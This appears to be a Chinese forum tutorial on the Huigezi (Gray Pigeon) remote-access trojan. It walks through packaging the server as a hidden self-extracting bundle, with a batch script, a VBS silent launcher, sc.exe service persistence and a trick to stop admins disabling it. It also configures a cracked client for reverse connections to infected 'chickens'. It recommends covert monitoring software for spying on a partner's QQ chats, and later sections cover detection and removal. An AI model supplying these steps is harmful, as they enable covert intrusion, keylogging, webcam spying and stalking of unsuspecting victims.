综合远程控制教程灰鸽子配置教程(菜鸟版+中级版+高级版)

2012/4/18 17:47:00  人气 1674    计算机网络论坛  
现在灰鸽子是越来越困难了,查杀太严重,新手基本 上很难捉到鸡,建议如果只是想监控男女朋友 QQ 聊天记录的新手, 直接购买网络人远程控制软件软件,非常好用的一款监控软件,免杀 做得很好, 鸽子其实不是免费的, 空间也是收费的。 没必要浪费时间)
灰鸽子教程
准备工具:
鸽子服务端
IcoSprite 图标更改器;
SC.exe 服务添加删除更改工具;
winrar
程序特点:
自解压形式,双击即可
制作过程: 1. 首先自己配置一下鸽子服务端,配置时*启动项设置*这里面的都不要填,不要写 入注册表,也不要用服务启动。其他的随你个人爱好。
2.用 SC 创建一个服务
运行 CMD.EXE 在 system32 的目录下运行执行
SC.exe * huigezi BinPath=“%systemroot%\system32\gezi.exe“type=own type= interact start= auto *Name=“gezi“‘ 这 句 是 用 SC 建 立 一 个 服 务 , 服 务 名 为 huigezi , 路 径 Binpath 为“%systemroot%\system32\gezi.exe“,类型 type 为 own 与 interact 交互,启动类型 start 为自 动,显示名 *Name 为“gezi“。
sc.exe descript_ion huigezi“不死鸽子“‘这句是将 huigezi 服务的描述改为“不死鸽子”
sc config wuauserv depend= huigezi ‘配置 huigezi 使 wuauserv 服务依存此服务 (wuauserv 可以根据自己喜欢改成其它服务, 这里的 wuauserv 是系统在 Windows * 网站的自动更新服务) 。
这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加 点。
3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册 表报警. 我们将他命名为 1.reg
4.创建一个 BAT 文件,并命名为 *.bat
@regedit /s %systemroot%\system32\1.reg @%systemroot%\system32\gezi.exe @del /q /f /s %systemroot%\system32\1.reg @del /q /f /s %systemroot%\system32\*.vbs @del /q /f /s %systemroot%\system32\*.bat
5.创建一个 vbs 并命名为 *.vbs
目的是为了作用是令 bat 里的内容以安静模式执行,这样就可以让 cmd 窗口跳出 来了,增加了不少隐蔽性。
里面写上如下代码:
On Error Resume Next set wshshell=*object (“wscript_.shell“) a=wshshell.run (“cmd.exe /C %systemroot%\system32\*.bat“, 0, TRUE)
6.用我门配置出来的服务端,并命名为 run.exe,用 run.exe 做一个自解压文件,并命 名为 gezi.exe.。
记得将解压模式为全部隐藏.解压后运行 run.exe, 当然你的服务端要自己做免杀, 这 里我就不多说了。八仙过海....
7.将 gezi.exe
1.reg *.vbs
*.bat 再用 winrar 制作一个自解压文件,解
压到%systemroot%\system32\ 解压后运行 *.vbs
当然解压模式依旧全部隐藏,替换同名文件
现在用 rar 捆绑出来的文件很多杀软都不杀,你也可以用系统自带的捆绑机,或 其他的捆绑机
这个方法可以用到其他的木马中
捆出来的自解压文件也可以自己再加工:去掉右键用“winrar 打开“
灰鸽子第一章:软件相关介绍:
灰鸽子 *VIP 专业版*
1.只用一个端口来传输所有通讯数据! 普通同类软件都用到了两个或两个以上的端口来 完成!
2.支持可以控制 Internet 连接共享、HTTP 透明代理上网的电脑!软件智能读取系统设 定的代理服务器信息,无需用户设置!
3.无需知道服务端 IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无 需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障 时,您可以使用备用上线方式来使用自动上线功能。在使用专用上线系统时,你还可以控制 远程电脑通过 Socks5 代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻 而易举的找到目标主机, 同时设置连接密码保证了服务主机的安全性! 同时具用牵手版的搜 索符合条件主机的功能: a.从主机窗口筛选: 可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游 戏! b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如 QQ.exe,就可以找到打开 了 QQ 的自动上线主机有哪些了!
5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或 文件夹,文件内容均以加密方式传输,确保通讯的安全性.
6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、 服务管理、管理管理、MS-DOS 模拟、代理服务控制!
7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主 机 IP 地址,地址位置,电脑名称,系统版本,备注等信息,
9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头, 且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕 获的画面存为 Mpeg-1 格式.远程语音也可以录制成 Wav 声音文件。
10.可以设置服务端开放 Socks5 代理服务器功能和 HTTP 代理服务功能!无需第三方软 件支持!支持 Windows9x/ME/2000/Xp/2003。
11.软件附带有四款实用工具: a. EXE 工具 : 可以修改任何 EXE 文件图标,支持真彩色! b. 内网端口映射器 : 它允许你将局域网内的服务映射到 internet 上,使你在局域网内 部也能使用自动上线功能! c. FTP 服务器 : 可以开本机 FTP 服务! d. Web 服务器 : 可以建立一个简单的 Web 服务器!
12.服务端程序在 Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比 如:Ctrl+Alt+del 等等,适用于管理服务器主机!远程屏幕捕获还可以录制为 Mpeg-1 文件格式.
13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切! 功能简单介绍: 【1】对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制、粘 贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。 【2】远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管 理! 【3】捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作 送到远程实现实时控制功能!
【4】视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行 语音对话! 【5】telnet(超级终端). 【6】注册表模拟器:远程注册表操作就像操作本地注册表一样方便! 【7】命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页, 筛选符合条件的机等,点一个按钮就可以让 N 台机器同时关机或进行其它操作! 【8】服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器! 【9】专用的自动上线系统,直接使用灰鸽子注册 ID 即可实现远程服务端自动上线! 【10】多种自动上线方式:专用上线、DNS 解析域名、固定 IP 等,用户自由选择! 注册灰鸽子软件后享有:
⒈享用软件的所有功能,没有任何限制! ⒉能使用对应的灰鸽子注册版本,能得到此版后期修正的正式版本! ⒊可以使用我们的专用上线系统,无需其它域名和空间支持! ⒋得到我们更好的技术服务! 注:*VIP 版* 包括 VIP2005、Version 1.2、Version 2.0 ! *企业版*用户只能使用企业版!不能使用其它版本! 5.加入会员后,会自动加入官方论坛。享受官方技术支持 灰鸽子第二章:好马配好鞍,服务端正确配置。
灰鸽子是一款要交钱的软件,也就是说,你使用 VIP 版的话是要交给作者每年几十块 钱的使用费(不作任何评论)因此网上也就有很多高手破解灰鸽子,让灰鸽子可以不用到灰 鸽子的官方网站进行验证, 从而可以不用交钱就可以使用, 相关版本有: 影子鹰破解专用版, 爱儿破解版,以及华夏黑客联盟的灰鸽子 sunray 破解版。 今天我们就用“灰鸽子 sunray 破解版“来向大家详细解析这款木马的服务端配置方式, 只 可实验,不可做坏事,大家不喜欢请跳过这一章。
第一节:未雨绸缪,实验准备。 第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如果杀毒软件监控 开着的话肯定会被删除的。
第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~
第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹式链接的,也就 是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。 (这一 点,等一下会详细解说)
第二节:实战开始。 把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会用到。 解压的文件里面有以下几个文件: H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远程控制客 户端。 http.exe 这个是本地 http 服务器,因为我们的灰鸽子是破解版的,通常正式版的灰鸽子 会到官方的服务器上去验证你的软件是否正版, 所以这个软件就是用来在本机子上建一个服 务器,骗过软件的,从而达到破解的目的。
sunray.exe 这个里面其实也就只是一个 host, 它把 http://www.huigezi.com 这个网站的域 名本地解析到本机,而不是解析到官方网站。vip_2005_0113.rar 这个是验证的软件,当我 们的软件解析到本机的时候它就会 下载这一个到客户端,用来验证用的。 其它的文件还有 config2005.asp,Operate.ini 还有四个文件夹,他们分别是(dat images login sound)我也不知道什么用的。应该是配置用的。
第 一 步 : 在 你 的 电 脑 上 新 建 一 个 ip.txt 的 文 本 文 件 , 内 容 如 下 : http://huigezi212.126.131.43:8000end 其中 212.126.131.43 这个是我的电脑 IP 地址, 8000 是连 接的端口,你可以把它写成你自己的 IP 地址,端口一般不要去改动,然后把这个文件上传 到你刚才申请的空间,如果你的电脑是动态 IP 的话,那你就要经常更新这个文件的内容,然 后上传到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和 你取得连接。 第二步,首先运行 sunray.exe,然后运行 http.exe 点开始服务!
第三步,运行客户端,也就是 H_Client.exe 这个文件,
点击“自动上线”选项,有几个要点要说的,
1) “备用自动上线,URL 转向域名或网页文件,这里呢,填写你刚才申请到的网站空 间地址和 ip.txt,比如 http://你的网站地址/ip.txt(当然,如果你是固定 IP 的话呢,可以写你 的 IP 地址,那么前面的申请空间,上传文件几步可以省略) 2) “自动连接密码” ,这个是表示你可以连接到的电脑所要用到的密码,如果为空的 话,也没什么大不了的,顶多就是别人也可以用你的“肉鸡” 3) “配置说明”建议你把“只使用备用自动上线”前的勾打上,因为我们的软件是破解 版的,官方的那个服务器我们是用不了啦~~~ 4) “用户名称” “用户密码”这两个地方乱填些数字进去就行了,破解版用不了正式版 的服务器的,它是服务器用来验证软件是否“正版”用的。
“安装选项”选项卡,建议修改一下名字,以免被发现,其它的自己看着办,看着喜欢 就选吧~~~^_^ “启动项”这个很重要,建议你修改一下名字,它主要是服务端随系统自动启动用的, 也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用的,这也是我们经常说的手 工清除木马的关键。也是长期以来很多人说无法清除灰鸽子的原因,因为它写成了服务,这 个的优先级是系统级的,所有使用这台电 脑的用户都会启动木马。
“代理服务” ,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务器,说不定人家 公布出来的代理服~务器地址有一部分是这些电脑的哦~~~ “高级选项”这里主要是用来对付杀毒软件和防火墙用的,默认是插入 IEXPLORER, 启动隐藏文件隐藏插入的 IE 进程,以及使用 UPX 压缩,这里就不用去改它的,默认就行。“服务器图标”是用来伪装用的,你自己选项自己喜欢的图标吧~~~ 配置好了就点击生成服务器,软件会优先从官方验证,但没效,出错了后就从本地服务 器验证,这就是我们要本机建 http 服务器的原因。好了,到此,服务端就生成了,不要运 行它,运行
了你就会中木马的, (不准做坏事)
软件使用方法:当别人中了你的木马后,它会从你的网站读取 ip.txt 这个文件,然后主 动连接到你的电脑,如果你此时也打开了客户端的话,连接建立成功,你可以控制这台电脑 了。具体有什么内容你自己摸索, 如果你是动态 IP 地址的话,那么你要每次把新的 ip.txt 上传到网站上去~~~ · 没有路由密码权限时的鸽 08-23 · 上网安全 Vista 自我防范 10-11 · 让濒临崩溃的 Windows XP 10-11 · 有备无患,快速自制救急 10-11 · 要你好看!Windows 看图工 10-11 · 空间赞助网提供不同类型 10-11 · 讨论 net.exe 和 net1.exe 的 10-10 · 让 3389 远程桌面传输更通 10-10 · 巧妙入侵渗透赌博站 10-10 · Aspx 空间扫权限工具 10-10 · Windows2003 最新提权工具 10-10 · 易淘乐提供 100M 免费全能 10-10 · 系统开机密码忘了不着急 10-09 · 中意网络提供免费 100M 免 10-09 · 与众不同 Windows XP 开始 10-08 · 让桌面图标翻跟斗 在 XP 上 10-08 · 上海宽元站长资助计划-提 10-08 · 个性化 Windows XP 的任务 10-07 · 趣盘提供 3G 免费网络硬盘 10-07 · 秀山热线提供 200MB 免费全 10-07 · 一次艰辛的提权过程 10-06 · 成功入侵 IT 大卖场的渗透 10-06 · mysqlhack- MYSQL 利用工 10-06 · lanker 一句话 PHP 后门客户 10-06 · WIXI 提供 3G 免费多媒体网 10-06 · 新人网络提供 100M/ftp 免 10-06 · 如何利用 QQ 带来高流量 10-05 · UuShare 提供免费网络文件 10-05
灰鸽子第三章:服务端工作方式:
灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大 成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户 端简易便捷的操作使刚入门的初学者都能充当黑客。 当使用在合法情况下时, 灰鸽子是一款 优秀的远程控制软件。但如果拿它做一些非法的事
,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同 的影响。 对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚, 在此我们只能进行简要 介绍。
灰鸽子客户端和服务端都是采用 Delphi 编写。黑客利用客户端程序配置出服务端程序。 可配置的信息主要包括上线类型 (如等待连接还是主动连接) 主动连接时使用的公网 IP 、 (域 名) 、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理, 图标等等。
服务端对客户端连接方式有多种, 使得处于各种网络环境的用户都可能中毒, 包括局域 网用户(通过代理上网) 、公网用户和 ADSL 拨号用户等。
下面介绍服务端: 配置出来的服务端文件文件名为 G_Server.exe(这是默认的,当然也可以改。 G_Server.exe 运行后将自己拷贝到 Windows 目录下(98/xp 下为系统盘的 windows 目录, 2k/NT 下为系统盘的 Winnt 目录),然后再从体内释放 G_Server.dll 和 G_Server_Hook.dll 到 windows 目录下。 G_Server.exe、 G_Server.dll 和 G_Server_Hook.dll 三个文件相互配合组成了 灰鸽子服务端, G_Server_Hook.dll 负责隐藏灰鸽子。通过截获进程的 API 调用隐藏灰鸽子 的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、 遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但仔细检 查却又发现不了什么异常。有些灰鸽子会多释放出一个名为 G_ServerKey.dll 的文件用来记 录键盘操作。注意,G_Server.exe 这个名称并不固定,它是可以定制的,比如当定制服务端 文件名为 A.exe 时,生成的文件就是 A.exe、A.dll 和 A_Hook.dll。
Windows 目录下的 G_Server.exe 文件将自己注册成服务(9X 系统写注册表启动项) ,每 次开机都能自动运行, 运行后启动 G_Server.dll 和 G_Server_Hook.dll 并自动退出。 G_Server.dll 文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll 则通过拦截 API 调用来 隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子 服务端文件的设置不同,G_Server_Hook.dll 有时候附在 Explorer.exe 的进程空间中,有时候 则是附在所有进程中。
灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些 API 函数被截获, 正常模式下难以遍历到灰鸽子的文件和模块, 造成查杀上的困难。 要卸载灰鸽子动态库而且 保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互联网上泛滥的局面。
灰鸽子第四章:双管齐下,手工和软件清除灰鸽子。
一.灰鸽子的手工检测 由于灰鸽子拦截了 API 调用,在正常模式下服务端程序文件和它注册的服务项均被隐 藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文 件名也是可以自定义的,这都给手工检测带来了一定的困难。
但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面的运行 原理分析可以看出, 无论自定义的服务器端文件名是什么, 一般都会在操作系统的安装目录 下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子 服务端。
由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。 进入安全模式的方法是:启动计算机,在系统进入 Windows 启动画面前,按下 F8 键(或者 在启动计算机时按住 Ctrl 键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全 模式” 。
1、 由于灰鸽子的文件本身具有隐藏属性, 因此要设置 Windows 显示所有文件。 “我 打开 的电脑” ,选择菜单“工具”—》 “文件夹选项” ,点击“查看” ,取消“隐藏受保护的操作系 统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹” ,然后 点击“确定” 。
2、打开 Windows 的“搜索文件” ,文件名称输入“_hook.dll” ,搜索位置选择 Windows 的安装目录(默认 98/xp 为 C:\windows,2k/NT 为 C:\Winnt) 。
3、 经过搜索, 我们在 Windows 目录 (不包含子目录) 下发现了一个名为 Game_Hook.dll 的文件。
4、根据灰鸽子原理分析我们知道,如果 Game_Hook.DLL 是灰鸽子的文件,则在操作 系统安装目录下还会有 Game.exe 和 Game.dll 文件。 打开 Windows 目录, 果然有这两个文件, 同时还有一个用于记录键盘操作的 GameKey.dll 文件。
经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了,下面就可以进行手 动清除。
二、灰鸽子的手工清除 经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要 有两步:1、清除灰鸽子的服务;2 删除灰鸽子程序文件。
注意:为防止误操作,清除前一定要做好备份。
(一) 、清除灰鸽子的服务 注意清除灰鸽子的服务一定要在注册表里完成, 对注册表不熟悉的网友请找熟悉的人帮 忙操作,清除灰鸽子的服务一定要先备份注册表,或者到纯 DOS 下将注册表文件更名,然 后在去注册表删除灰鸽子的服务。因为病毒会和 EXE 文件进行关联 2000/XP 系统: 1、打开注册表编辑器(点击“开始”-》 “运行” ,输入“Regedit.exe” ,确定。,打开 ) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services 注册表项。
2、点击菜单“编辑”-》 “查找”“查找目标”输入“game.exe” , ,点击确定,我们就 可以找到灰鸽子的服务项(此例为 Game_Server,每个人这个服务项名称是不同的) 。
3、删除整个 Game_Server 项。 98/me 系统: 在 9X 下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 项, 我们立即看到
名为 Game.exe 的一项,将 Game.exe 项删除即可。
(二) 、删除灰鸽子程序文件 删除灰鸽子程序文件非常简单, 只需要在安全模式下删除 Windows 目录下的 Game.exe、 Game.dll、Game_Hook.dll 以及 Gamekey.dll 文件,然后重新启动计算机。至此,灰鸽子 VIP 2005 服务端已经被清除干净。 以上介绍的方法适用于我们看到的大部分灰鸽子木马及其变种, 然而仍有极少数变种采 用此种方法无法检测和清除。同时,随着灰鸽子新版本的不断推出,作者可能会加入一些新 的隐藏方法、防删除手段,手工检测和清除它的难度也会越来越大。
三、防止中灰鸽子病毒需要注意的事项 1. 给系统安装补丁程序。 通过 Windows * 安装好系统补丁程序(关键更新、 安全更 新和 Service pack), 其中 MS04-011、 MS04-012、 MS04-013、 MS03-001、 MS03-007、 MS03-049、 MS04-032 等都被病毒广泛利用,是非常必要的补丁程序
2. 给系统管理员帐户设置足够复杂足够强壮的密码,最好能是 10 位以上,字母+数字+ 其它符号的组合;也可以禁用/删除一些不使用的帐户
3. 经常更新杀毒软件(病毒库) ,设置允许的可设置为每天定时自动更新。安装并合理 使用网络防火墙软件, 网络防火墙在防病毒过程中也可以起到至关重要的作用, 能有效地阻 挡自来网络的攻击和病毒的入侵。部分盗版 Windows 用户不能正常安装补丁,这点也比较 无奈,这部分用户不妨通过使用网络防火墙来进行 一定防护
4. 关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括 C$$$$、D$$$$等管理 共享。完全单机的用户可直接关闭 Server 服务。这些都可以用 winxp 总管等优化软件关闭。
5. 不要随便打开或运行陌生、可疑文件和程序,如邮件中的奇怪附件,外挂程序等。
四、灰鸽子(Huigezi、Gpigeon)专用检测清除工具
软件名称: 灰鸽子(Huigezi、Gpigeon)专用检测清除工具 界面语言: 简体中文 软件类型: 国产软件 运行环境: /Win9X/Me/WinNT/2000/XP/2003 授权方式: 免费软件 软件大小: 414KB 软件简介: 由灰鸽子工作室开发的,针对灰鸽子专用清除器!可以清除 VIP2005 版灰鸽 子服务端程序(包括杀毒软件杀不到的灰鸽子服务端)和灰鸽子 *辐射正式版* 和 DLL 版服 务端 牵手版服务端运行 DelHgzvip2005Server.exe 文件清除 VIP2005 版灰鸽子服务端程序, 运行 un_hgzserver.exe 文件清除灰鸽子 *辐射正式版* 和 DLL 版服务端 牵手版服务端
结束语:写完了这篇教程,我也该准备重装系统了,因为我运行了自己生成的木马,体 验到了它的强大功能,不想手工去清除了,直接重装算了。
考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份, 灰鸽子教程放在了文章后面第二部份,请大家耐心观看)
第一部份: 第一部份:网络人远程监控软件 网络人远程控制个人版分为 Netman 办公版与 Netman 监控版。 两个版本主要区别在于: Netman 办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人 远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件; Netman 监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监 管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman 监控版详细安装方法: 1.要实现远程监控控制,双方都要安装 Netman 监控版,双方电脑的安装方法一样, 控制端同时也是被控端,只要知道 ID 和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman 监控版.EXE” ,软件默认安装路径为“C:\Program Files\Netman” ,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方 式,需要自己进入安装文件夹,双击 iexplore.exe 启动软件,这时会弹出一个提示窗口,问 是否要让软件随系统启动,通常直接点“确定” 。
3.完成以上操作后,再按 ctrl+y 即可呼出软件主界面。监控版必须使用会员登录才能实 现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录” ,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的 不是前面填写的“登录密码” ,而是从其他电脑连接本电脑时需要输入的“控制密码” 。很多 用户会误以为这里是修改“登录密码” ,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护, “登录密码” 用于登录会员 ID, “控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要 修改这两个密码,可点击“选项”-“修改密码” 。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何 图标和提示。想要再次操作软件,请按下 ctrl+y 键。 右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件” -“退出” 。很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。 7.有同样的方法在另一台电脑安装 Netman 监控版并使用另一个会员登录,在“远程 IP/ID”处输入对方的会员 ID 和控制密码,点击“连接”即可连接远程电脑。
8.Netman 监控版“连接”按扭左侧有一个“中转”选项,是通过网络人的服务器中转 优化连接速度。 通常不建议选择 “中转” 因为连接速度正常时, , 选上反而会使得速度变慢。 在没选择的情况下,软件会根据网络状况,自行判断是否通过服务器中转。软件还有许多设 置选项,在不了解功能的情况下,不要随意修改。

. 有事请联系本人!

发表回复

   


  通知楼主

沙发

◇Dmc丶 ℡臭鸭蛋〞つ.04-18 17:51
看帖回帖是美德!

回复只看TA